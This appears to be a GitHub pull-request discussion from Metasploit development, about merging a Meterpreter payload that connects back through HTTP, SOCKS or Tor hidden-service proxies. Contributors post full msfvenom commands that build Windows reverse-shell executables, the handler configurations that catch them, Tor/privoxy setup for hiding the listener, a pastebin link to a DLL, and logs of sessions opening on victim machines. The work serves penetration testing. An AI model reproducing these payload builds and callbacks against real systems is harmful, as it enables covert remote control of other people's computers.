New meterpreter payload reverse_https_proxy #2104

Merged
merged 2 commits into from Jul 25, 2013

Projects

None yet

5 participants

@mubix
Contributor
mubix commented Jul 12, 2013

splitting of pull request #1044

@alexmaloteaux
Contributor

hi mubix, hust sent you a pr with those modifications :
fix a bug where options are not seen in exploit/handler
add proxy authentification
add socks support
add tor hidden services support

from here
https://github.com/alexmaloteaux/metasploit-framework/tree/methttpsproxy

@alexmaloteaux
Contributor

to test the msfvenom command below you need to apply this small 2 line patch to msfvenom : #2105

http proxy without authentification

for testing i used a local host with a windows vm running apache as proxy and a win 7 vm as victim.
First configure apache has a proxy without autentification by adding this configuration :

LoadModule proxy_connect_module modules/mod_proxy_connect.so
LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_http_module modules/mod_proxy_http.so

ProxyRequests On
ProxyVia On
AllowCONNECT 4444

<Proxy *>
Order deny,allow
Allow from all

Then to get this session : Victim(192.168.170.60) -> Proxy (192.168.170.50:80) -> handler (192.168.5.1:4444):
./msfvenom -p windows/meterpreter/reverse_https_proxy -e generic/none -f exe-only LHOST=192.168.5.1 LPORT=4444 PROXYHOST=192.168.170.50 PROXYPORT=80 > ../met1.exe

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https_proxy
set LHOST 192.168.5.1
set LPORT 4444
set PROXYHOST 192.168.170.50
set PROXYPORT 80
set ExitOnSession false
exploit -j

[] Meterpreter session 1 opened (192.168.5.1:4444 -> 192.168.5.50:49792) at 2013-07-15 16:23:17 +0100
msf exploit(handler) > sessions -i 1
[
] Starting interaction with 1...

meterpreter > sysinfo
Computer : SASHA-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32

http proxy with authentification

reconfigure apache proxy for authentification like this :
(http://stackoverflow.com/questions/724599/setting-up-an-apache-proxy-with-authentication)

LoadModule proxy_connect_module modules/mod_proxy_connect.so
LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_http_module modules/mod_proxy_http.so

ProxyRequests On
ProxyVia On
AllowCONNECT 4444

<Proxy *>
Order deny,allow
Allow from all
AuthType Basic
AuthName "Password Required"
AuthUserFile password.file
AuthGroupFile group.file
Require group usergroup

then for an authentification with test/pwd :
./msfvenom -p windows/meterpreter/reverse_https_proxy -e generic/none -f exe-only LHOST=192.168.5.1 LPORT=4444 PROXYHOST=192.168.170.50 PROXYPORT=80 PROXY_USERNAME=test PROXY_PASSWORD=pwd > ../met2.exe

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https_proxy
set LHOST 192.168.5.1
set LPORT 4444
set PROXYHOST 192.168.170.50
set PROXYPORT 80
set PROXY_USERNAME test
set PROXY_PASSWORD pwd
set ExitOnSession false
exploit -j

[] Meterpreter session 2 opened (192.168.5.1:4444 -> 192.168.5.50:50140) at 2013-07-15 16:31:19 +0100
msf exploit(handler) > sessions -i 2
[
] Starting interaction with 2...
meterpreter > sysinfo
Computer : SASHA-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >

socks proxy

wininet support only socks4 protocol (even no socks4 ;( ), so authentification and dns resolution arent't supported
(http://social.msdn.microsoft.com/Forums/windowsdesktop/en-US/0de0e7cf-63a9-4ee3-9163-9168e45be872/feature-inqury-wininet-socks-5)

For testing i used this small socks proxy listening on port 1080 : http://3proxy.ru/download/

then :

./msfvenom -p windows/meterpreter/reverse_https_proxy -e generic/none -f exe-only LHOST=192.168.5.1 LPORT=4444 PROXYHOST=192.168.170.50 PROXYPORT=1080 PROXY_TYPE=SOCKS > ../met3.exe

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https_proxy
set LHOST 192.168.5.1
set LPORT 4444
set PROXYHOST 192.168.170.50
set PROXYPORT 1080
set PROXY_TYPE SOCKS
set ExitOnSession false
exploit -j

[] Meterpreter session 1 opened (192.168.5.1:4444 -> 192.168.5.50:50298) at 2013-07-15 16:39:40 +0100
msf exploit(handler) > sessions -i 1
[
] Starting interaction with 1...
meterpreter > sysinfo
Computer : SASHA-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32

Tor hidden services

Unfortunatly it is not possible to use direct socks connection on tor to connect to an hidden service due to the dns limitation of socks4 ;(.
But it is possible through an intermediary http proxy like privoxy.
Also when you get the sessions due to tor low speed/latency , wait some seconds/minutes for the victim side to load all the modules before interacting with the sessions.
i have a 2mb theorical line and if i interact with the session to soon i get an unknow command error msg and it breaks the session.
It is pretty slow here but it works.
Best way to test this is to enable debug flag in metsrv.dll and see the output in debugview.exe

Then to get a seesion like this one : victim (127.0.0.1) -> privoxy (127.0.0.1:8118) -> tor (127.0.0.1:9050) -> attacker hiddenservice (2ei2yd5ng7mmge7x.onion:8443) -> handler (127.0.0.1:4444) :

On the host configure a tor hidden service by adding these lines in /etc/tor/torrc
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 8443 127.0.0.1:4444

Launch tor and get the hidden onion hostname by :
cat /var/lib/tor/hidden_service/hostname
2ei2yd5ng7mmge7x.onion

Ont he victim vm launch tor
configure privoxy to use tor by adding this line to the privoxy conf
forward-socks5 / 127.0.0.1:9050 .
then launch privoxy

./msfvenom -p windows/meterpreter/reverse_https_proxy -e generic/none -f exe-only LHOST=127.0.0.1 LPORT=4444 PROXYHOST=127.0.0.1 PROXYPORT=8118 HIDDENHOST=2ei2yd5ng7mmge7x.onion HIDDENPORT=8443 > ../met4.exe

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https_proxy
set LHOST 127.0.0.1
set LPORT 4444
set HIDDENHOST 2ei2yd5ng7mmge7x.onion
set HIDDENPORT 8443
set PROXYHOST 127.0.0.1
set PROXYPORT 8118
set ExitOnSession false
exploit -j

[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:37326) at 2013-07-15 17:11:42 +0100

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer : SASHA-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >

@alexmaloteaux
Contributor

this is the metsrv.dll file i used with debug flag enabled : http://pastebin.com/uDARPZH5

to get it : pbget http://pastebin.com/uDARPZH5

@alexmaloteaux
Contributor

TODO :

I did not managed to get https on https proxy working

whatever combinaison of flag/conf i used in my test code wininet keeps connecting to an https proxy with http packet and i get an error Your browser sent a request that this server could not understand ...
This is not a big issue but when using a remote http proxy with authentification, the credentials are seen clear on the wire...

@alexmaloteaux alexmaloteaux referenced this pull request in mubix/meterpreter Jul 15, 2013
Merged

enable proxy authentification #1

@Meatballs1
Contributor

Tested fine unauthenticated via Burp.

Tested fine authenticated via Squid with NCSA auth (whatever that is).

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_https_proxy):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   EXITFUNC        process          yes       Exit technique: seh, thread, process, none
   HIDDENHOST                       no        The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation
   HIDDENPORT                       no        The hidden port to connect to, when set it will be used instead of LPORT for stager generation
   LHOST           0.0.0.0          yes       The local listener hostname
   LPORT           4444             yes       The local listener port
   PROXYHOST       192.168.1.121    yes       The address of the http proxy to use
   PROXYPORT       3128             no        The Proxy port to connect to
   PROXY_PASSWORD  test             no        An optional password for HTTP proxy authentification
   PROXY_TYPE      HTTP             yes       Http or Socks4 proxy type (accepted: HTTP, SOCKS)
   PROXY_USERNAME  test             no        An optional username for HTTP proxy authentification


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://192.168.1.121:4444/
[*] Starting the payload handler...
msf exploit(handler) > previous
msf payload(reverse_https_proxy) > set PROXYHOST 192.168.1.121
PROXYHOST => 192.168.1.121
msf payload(reverse_https_proxy) > set PROXYPORT 3128
PROXYPORT => 3128
msf payload(reverse_https_proxy) > set PROXY_
set PROXY_PASSWORD  set PROXY_TYPE      set PROXY_USERNAME  
msf payload(reverse_https_proxy) > set PROXY_
set PROXY_PASSWORD  set PROXY_TYPE      set PROXY_USERNAME  
msf payload(reverse_https_proxy) > set PROXY_PASSWORD test
PROXY_PASSWORD => test
msf payload(reverse_https_proxy) > set PROXY_USERNAME test
PROXY_USERNAME => test
msf payload(reverse_https_proxy) > generate -t exe -f /mnt/hgfs/share/meterp_proxy_auth.exe
[*] Writing 73802 bytes to /mnt/hgfs/share/meterp_proxy_auth.exe...
msf payload(reverse_https_proxy) > 
[*] 192.168.1.121:33189 Request received for /hpR2...
[*] 192.168.1.121:33189 Staging connection for target /hpR2 received...
[*] Patched user-agent at offset 653344...
[*] Activated custom proxy http://192.168.1.121:3128, patch at offset 653608...
[*] Patched transport at offset 653004...
[*] Patched URL at offset 653072...
[*] Patched Expiration Timeout at offset 653944...
[*] Patched Communication Timeout at offset 653948...
[*] Meterpreter session 4 opened (192.168.1.121:4444 -> 192.168.1.121:33189) at 2013-07-24 23:26:59 +0100
sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: blah\deblah

@Meatballs1
Contributor

Tor hidden services:

msf payload(reverse_https_proxy) > show options

Module options (payload/windows/meterpreter/reverse_https_proxy):

   Name            Current Setting         Required  Description
   ----            ---------------         --------  -----------
   EXITFUNC        process                 yes       Exit technique: seh, thread, process, none
   HIDDENHOST      walmjxcnm7q6nuqh.onion  no        The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation
   HIDDENPORT      8443                    no        The hidden port to connect to, when set it will be used instead of LPORT for stager generation
   LHOST           127.0.0.1               yes       The local listener hostname
   LPORT           4444                    yes       The local listener port
   PROXYHOST       127.0.0.1               yes       The address of the http proxy to use
   PROXYPORT       8118                    no        The Proxy port to connect to
   PROXY_PASSWORD                          no        An optional password for HTTP proxy authentification
   PROXY_TYPE      HTTP                    yes       Http or Socks4 proxy type (accepted: HTTP, SOCKS)
   PROXY_USERNAME                          no        An optional username for HTTP proxy authentification

msf payload(reverse_https_proxy) > previous
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_https_proxy):

   Name            Current Setting         Required  Description
   ----            ---------------         --------  -----------
   EXITFUNC        process                 yes       Exit technique: seh, thread, process, none
   HIDDENHOST      walmjxcnm7q6nuqh.onion  no        The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation
   HIDDENPORT      8443                    no        The hidden port to connect to, when set it will be used instead of LPORT for stager generation
   LHOST           127.0.0.1               yes       The local listener hostname
   LPORT           4444                    yes       The local listener port
   PROXYHOST       192.168.1.121           yes       The address of the http proxy to use
   PROXYPORT       8118                    no        The Proxy port to connect to
   PROXY_PASSWORD                          no        An optional password for HTTP proxy authentification
   PROXY_TYPE      HTTP                    yes       Http or Socks4 proxy type (accepted: HTTP, SOCKS)
   PROXY_USERNAME                          no        An optional username for HTTP proxy authentification


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set PROXYHOST 127.0.0.1
PROXYHOST => 127.0.0.1
msf exploit(handler) > jobs -K
Stopping all jobs...
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://walmjxcnm7q6nuqh.onion:8443/
[*] Starting the payload handler...
msf exploit(handler) > [*] 127.0.0.1:47487 Request received for /gSZH...
[*] 127.0.0.1:47487 Staging connection for target /gSZH received...
[*] Patched user-agent at offset 653344...
[*] Activated custom proxy http://127.0.0.1:8118, patch at offset 653608...
[*] Patched transport at offset 653004...
[*] Patched URL at offset 653072...
[*] Patched Expiration Timeout at offset 653944...
[*] Patched Communication Timeout at offset 653948...
[*] Meterpreter session 7 opened (127.0.0.1:4444 -> 127.0.0.1:47487) at 2013-07-25 00:12:13 +0100
sessions -i 7
[*] Starting interaction with 7...

meterpreter > getuid
Server username: blah\deblah
@wchen-r7
Contributor

Will be looking at this today.

@wchen-r7
Contributor

Works for me, still doing more tests on this:

msf exploit(handler) > run

[*] Started HTTPS reverse handler on https://10.0.1.76:4444/
[*] Starting the payload handler...
[*] 10.0.1.76:64668 Request received for /U6xY...
[*] 10.0.1.76:64668 Staging connection for target /U6xY received...
[*] Patched user-agent at offset 640488...
[*] Patched transport at offset 640148...
[*] Patched URL at offset 640216...
[*] Patched Expiration Timeout at offset 640748...
[*] Patched Communication Timeout at offset 640752...
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.76:64668) at 2013-07-25 14:58:48 -0500

meterpreter >
@wchen-r7
Contributor

Tested with multi/handler on systems Windows XP, Windows 7, Windows 2003 SP2, Windows 8. No issues. Not as stable w/ existing exploits. Difficult to prevent this kind of issue happening, because when those exploits were written, this windows/meterpreter/reverse_https_proxy did not exist. You guys might just have to be aware of that until we look into each case one by one, and maybe fix them.

@wchen-r7 wchen-r7 added a commit that referenced this pull request Jul 25, 2013
@wchen-r7 wchen-r7 Land #2104 - reverse_https_proxy 7b7603a
@wchen-r7 wchen-r7 merged commit 99de616 into rapid7:master Jul 25, 2013

1 check passed

default The Travis CI build passed
Details
@corelanc0d3r
Contributor

good work, alex :)

@alexmaloteaux
Contributor

hi @wchen-r7 , if this pr is merged, then the meterpreter associated pr should be merged too and metsrv.dll updated or it won't work at all. rapid7/meterpreter#12
@corelanc0d3r you too ;)

@Meatballs1
Contributor

@todb-r7 Are there any ways to make dependencies between pulls/submodules etc?

@Meatballs1 Meatballs1 referenced this pull request Dec 18, 2013
Merged

Add a bind port setting to reverse listeners #2448

3 of 3 tasks complete
@mubix mubix deleted the mubix:meterpreter_https_proxy branch Mar 11, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment